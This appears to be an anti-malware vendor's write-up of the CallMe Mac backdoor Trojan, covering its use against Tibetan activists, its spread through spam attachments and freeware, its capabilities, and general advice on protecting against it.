The CallMe application is a backdoor Trojan that is compatible only with Mac computers. Malware researchers first spotted the CallMe Trojan seven years ago. Thankfully, the CallMe Trojan has not been very active in the past few years, which may mean that its creators may have abandoned the project. The CallMe backdoor Trojan is not an overly complex threat. This Trojan is able to run shell commands on the infected machine and to steal information from the contacts list of the victim. At first, this may seem like a redundant feature, but the CallMe Trojan was employed in an attack targeting Tibetian activists. As soon as the CallMe Trojan was able to compromise their systems, the threat could steal the names of the individuals in their contacts list and therefore reveal personal information about them. This helped the attackers reveal the identities of more activists.
In order to compromise the targeted systems, the attackers relied on a known exploit called CVE-2009-0563. This is how the CallMe malware was capable of injecting its malicious files in the hosts. This particular exploit affects an old version of Microsoft Office, and it has been known for more than a decade now.
Besides email distribution, the CallMe Trojan may infect the Mac system using two additional channels. Security researchers have spotted the CallMe Trojan in a bunch of freeware installer packages. While most free packages are generally free of malware, that is not always the case. Now and then, you are likely to come across one that will end up containing apps of less-than-savory nature, and you may not necessarily spot them right away. Running a security scan of every downloaded software installer is paramount to every PC, regardless of its OS. Malware-laden websites may provide fertile ground for potential CallMe Trojan infections, too. The Internet is chock full of potentially dangerous sites anyway, which is why browsing-related incidents are no longer a rare occurrence.
Yet, CallMe is most likely to knock at your door as part of spam email campaigns. In that case, it will come under the guise of a formal document — a commercial invoice, a bank statement, a purchase order, or a plane ticket. Opening the document launches specific scripts, which, in turn, plant the real malware onto the targeted system. The payload contains a backdoor, as well as an info stealer module.
Once running, the CallMe Trojan may prove capable of performing a slew of activities while remaining mostly unnoticed for the time being. Besides collecting system data (macOS version, hardware data, network credentials, etc.), the malware could potentially manage your running processes, apps, microphone, web camera, and even personal files. Once CallMe can read your data, it is only a matter of time before that data goes through the backdoor to a remote server. Unfortunately, the potentially harmful stuff doesn't end there — the backdoor can serve as a gateway for additional malware-laden modules at the attackers’ discretion. That’s why using a robust anti-malware tool providing real-time protection is, and will remain, a must.
The CallMe malware may not be the most impressive backdoor Trojan out there, but it has probably served its purpose successfully. It is not unlikely that the creators of the CallMe Trojan may repackage it in the future and weaponize it further. Some Mac users falsely believe that their systems are impenetrable to any cybercriminal as this talking point has been circulating the Web for many years. This has been proven to be not only an incorrect statement but also a dangerous notion that leads users into a false sense of security that puts them at risk. Remember that it is crucial to keep all your software up to date as neglecting updates may put your system and your data at risk of cyberattacks. Also, do not download software from unknown sources or shady websites. Make sure you download and install a legitimate anti-virus tool compatible with your OSX.